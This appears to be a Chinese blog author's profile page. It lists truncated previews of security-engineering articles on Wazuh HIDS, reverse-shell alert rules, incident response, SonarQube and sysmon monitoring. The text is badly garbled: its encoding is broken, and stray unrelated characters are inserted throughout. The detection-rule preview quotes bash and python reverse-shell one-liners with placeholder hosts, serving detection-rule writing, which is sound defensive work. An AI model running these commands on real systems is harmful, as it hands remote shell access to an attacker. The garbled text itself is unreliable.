加入MT剛好3個(gè)月整考余,來(lái)記錄一些自己的發(fā)現(xiàn)和感悟。 入職第一周-如何快速進(jìn)入工作狀態(tài) 和所有新人一樣吉挣,公司的新人培訓(xùn)計(jì)劃提供了很多了解公司以及如何開(kāi)展工作的課程,但是因?yàn)樾氯?..
發(fā)簡(jiǎn)信
IP屬地:河南
-
安全工程師如何快速適應(yīng)新企業(yè)及一些新員工感悟
-
Wauzh原理簡(jiǎn)析及audit規(guī)則風(fēng)險(xiǎn)評(píng)估
HIDS基本原理 熟悉HIDS的朋友應(yīng)該了解,服務(wù)器的shell監(jiān)控一般有兩種蚁孔,一種依靠Linux的audit審計(jì)功能,比如Wazuh惋嚎,一種是重編譯和替換bash二進(jìn)制文件杠氢,...
-
企業(yè)安全-淺談員工行為監(jiān)控
我目前就職于一家私企的安全部,主要做安全審計(jì)的工作另伍,很多公司的離職流程沒(méi)有考慮過(guò)員工的異常行為審計(jì)鼻百,18年我在逛微博的時(shí)候看到google的一條新聞,審計(jì)人員發(fā)現(xiàn)一名員工在離...
-
Wauzh自定義反彈shell告警規(guī)則常見(jiàn)反彈: bash -i >& /dev/tcp/ip/port0>&1 python -c"import os,socket,subprocess;s=socket.so...
-
Wazuh配置使用騰訊企業(yè)郵箱告警
測(cè)試環(huán)境: CentOS Linux release 7.6.1810 Wazuh 3.10.2 1摆尝、wazuh服務(wù)器上安裝postfii及相關(guān)服務(wù) yum install ...
-
開(kāi)源HIDS-Wauzh功能測(cè)試一温艇、Wazuh 守護(hù)進(jìn)程及工具進(jìn)程 守護(hù)進(jìn)程 ossec-agentd https://documentation.wazuh.com/3.10/user-manual/re...
-
開(kāi)源HIDS-Wauzh測(cè)試使用
Wazuh簡(jiǎn)介 前端時(shí)間調(diào)研了一些HIDS的開(kāi)源系統(tǒng): https://github.com/Neo23x0/Fenrir更加方便(不需要安裝代理或者軟件包)使用的IOC掃描...
-
應(yīng)急響應(yīng)-Linux應(yīng)急排查手冊(cè)
賬號(hào)排查 grep :0: /etc/passwd #檢查是否產(chǎn)生了新用戶,和UID堕汞、GID為0的用戶 stat /etc/passwd #檢查文件修改記錄 awk -F: ...
-
git blame使用
命令名稱: git-blame - 顯示文件的每一行最后修改的版本和作者 用法: git blame [-c] [-b] [-l] [--root] [-t]...
-
安全系統(tǒng)建設(shè)-SonarQube實(shí)現(xiàn)GitLab代碼審計(jì)最近領(lǐng)導(dǎo)讓我調(diào)研一下代碼審計(jì)的開(kāi)源工具勺爱,發(fā)現(xiàn)sonarqube這個(gè)系統(tǒng)能夠滿足我們的需求,可以與gitlab聯(lián)動(dòng)進(jìn)行代碼審計(jì)讯检。 一琐鲁、代碼審計(jì)需求及方案 滿足gitlab一旦提...
-
一步步編寫(xiě)SonarQube Plugin插件不好寫(xiě)?人灼! 插件確實(shí)不好寫(xiě)围段,因?yàn)椴寮遣迦臊嫶蟮南到y(tǒng)當(dāng)中工作的,那也就意味著寫(xiě)插件需要具備一定的領(lǐng)域知識(shí)投放,包括系統(tǒng)架構(gòu)奈泪、擴(kuò)展點(diǎn)、業(yè)務(wù)共性及差異、API及其業(yè)務(wù)模型對(duì)應(yīng)段磨、安...
-
Windows sysmon+winlogbeat+ELK實(shí)現(xiàn)Windows監(jiān)控
一取逾、sysmon告警介紹 sysmon提供21種事件告警: Event ID 1:進(jìn)程創(chuàng)建 Event ID 2:進(jìn)程更改文件創(chuàng)建時(shí)間 Event ID 3:網(wǎng)絡(luò)連接 Eve...
-
企業(yè)安全-如何在Github上刪除敏感數(shù)據(jù)
一、 前言 在企業(yè)安全中苹支,常有安全意識(shí)薄弱的員工將企業(yè)核心代碼上傳到了GitHub砾隅,可是當(dāng)上傳者無(wú)法及時(shí)定位又需要快速的刪除這些代碼時(shí),GitHub提供了兩個(gè)協(xié)議债蜜,用于保護(hù)被...
-
如果你是程序員寻定,或者有一顆喜歡寫(xiě)程序的心儒洛,喜歡分享技術(shù)干貨、項(xiàng)目經(jīng)驗(yàn)狼速、程序員日常囧事等等琅锻,歡迎投稿《程序員》專題。 專題主編:小彤花園 http://www.reibang.com/users/4a4eb4feee62/ 【程序員】專題拒稿指北:http://www.reibang.com/p/7c8b33b5f63b 投稿須知: 1.收錄相關(guān)技術(shù)文章向胡,但不限于技術(shù)恼蓬,也可以是項(xiàng)目經(jīng)驗(yàn)類的文章和程序員日常。 2.文章內(nèi)不得有任何推廣信息僵芹。包括但不限于公眾號(hào)处硬、微博、微信拇派,更不得在通過(guò)投稿后再修改文章加入推廣信息荷辕。你可以將這些推廣以及個(gè)人信息放在個(gè)人主頁(yè)介紹里。 3.字?jǐn)?shù)極少件豌,段落混亂疮方,大段代碼沒(méi)有放到代碼框的文章不收錄 4.不相關(guān)的內(nèi)容不收錄,請(qǐng)確認(rèn)文章內(nèi)容和本專題相關(guān) 目前針對(duì)優(yōu)質(zhì)作者及愛(ài)好者茧彤,開(kāi)設(shè)了官方程序員微信群案站,希望加入請(qǐng)發(fā)簡(jiǎn)信給主編小彤花園索取個(gè)人微信,主編會(huì)將你加入到【程序員】微信群棘街,分享內(nèi)容蟆盐,收獲知識(shí)。添加微信時(shí)備注昵稱遭殉。
-
Hi险污,很高興在@IT·互聯(lián)網(wǎng)專題遇見(jiàn)你痹愚。 收錄范圍:收錄IT&互聯(lián)網(wǎng)行業(yè)觀察與思考富岳,數(shù)碼產(chǎn)品極客體驗(yàn)分析等類型文章 投稿須知:http://www.reibang.com/p/4edc76104c27 專題主編:@若錦 http://www.reibang.com/u/e4c63b354a77 官方社群:可聯(lián)系添加 @若錦 加入專題官方社群交流、學(xué)習(xí)拯腮,添加時(shí)備注簡(jiǎn)書(shū)ID窖式。
